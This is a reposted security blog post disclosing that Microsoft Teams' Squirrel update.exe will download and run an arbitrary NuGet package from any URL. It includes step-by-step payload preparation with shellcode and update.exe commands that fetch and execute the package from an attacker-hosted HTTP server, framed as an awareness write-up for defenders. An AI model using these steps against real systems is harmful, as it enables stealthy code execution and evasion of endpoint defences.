Nuget/Squirrel uncontrolled endpoints leads to arbitrary code execution
2019-07-02 13:46:13 Author: medium.com(查看原文) 阅读量:654 收藏

Reegun J

Update :2-July-2019

https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56

When i was researching Microsoft ‘Teams,’ I came across an interesting argument ‘update’, I got to know from Squirrel documentation that this command will download and execute the respective Nuget package automatically, I was like why Microsoft has this feature? can i exploit this?

The Package creation was bit challenging one, It took some hours to figure out how easy it is, Then i tried to create a reverse shell , tried the update command from Microsoft Teams and voila! I got a reverse shell.

I reported to Microsoft and they are not bad, they responded to me and validated the vulnerable endpoint and postponed the fix to future release, I was waiting for the fix so i can make it release publicly.

But, Of-course most of them hunting for the exploits and doing good for the community to protect from adversaries, I got an update in my Twitter that another researcher https://twitter.com/MrUn1k0d3r released similar vulnerable endpoint in Microsoft Teams that also from ‘update.exe’ , Got an update that https://twitter.com/Hexacorn also researched about Squirrel packages initially , The both researchers did a fantastic work on this, So i decided finally to make it public since i spent most of the time in this and without fixing this, the adversaries/insiders likely use this technique for EDR/IDS evasion, So this post will make the blueteam-defense team aware of this situation.

%localappdata%/Microsoft/Teams/update.exe

%localappdata%/Microsoft/Teams/current/squirrel.exe

Payload preparation:

  1. extract any nupkg package, in my example Exploit-1.5.60-full.nupkg
  2. goto Exploit-1.5.60-full\lib\net45 and drop your shellcode as ‘squirrel.exe’ compress the complete folder as ‘Exploit-1.5.60-full.nupkg’
  3. Calculate the metadata with below command. sha1sum Exploit-1.5.60-full.nupkg && wc -c < Exploit-1.5.60-full.nupkg Output : fa8b87f0b995498a6e890c832dcaf968997608d4 Exploit-1.5.60-full.nupkg 4695
  4. create a file named RELEASES and copy the above output and save. So the main directory contains 2 file Exploit-1.5.60-full.nupkg and RELEASES.
  5. upload to any http server.

How to attack :

  1. Download and execute:

Step 1: Go to target application folder, So go to “%localappdata%[application Folder]” Step 2: Run the below command, update.exe — update=[http server contains the above 2 files] E.g update.exe — update=http://192.168.10.251/

Now the update command will download the malicious package and install automatically.

2. Download :

update.exe — download=[http server contains the above 2 files]

It will download the package containing shellcode to “packages” folder.

What is the impact?

  1. Malicious code execution from Microsoft legitimate binary (Living off the Land)
  2. No special privilege required, just a standard windows user can able to exploit this.
  3. RedTeam/Insiders will use this evade EDR/IDS.
  4. Privilege escalation happens, if the application has control of SYSTEM files.

What is the Issue?

  1. There is no controlled design that application to update from authenticated URL.
  2. Allowing 3rd party url to download the package.
  3. I would not say the issue with Squirrel application design, but Developers might redact the unwanted arguments and push automatic updates.

LOLBAS/LOLBINS contributions:


文章来源: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
如有侵权请联系:admin#unsafe.sh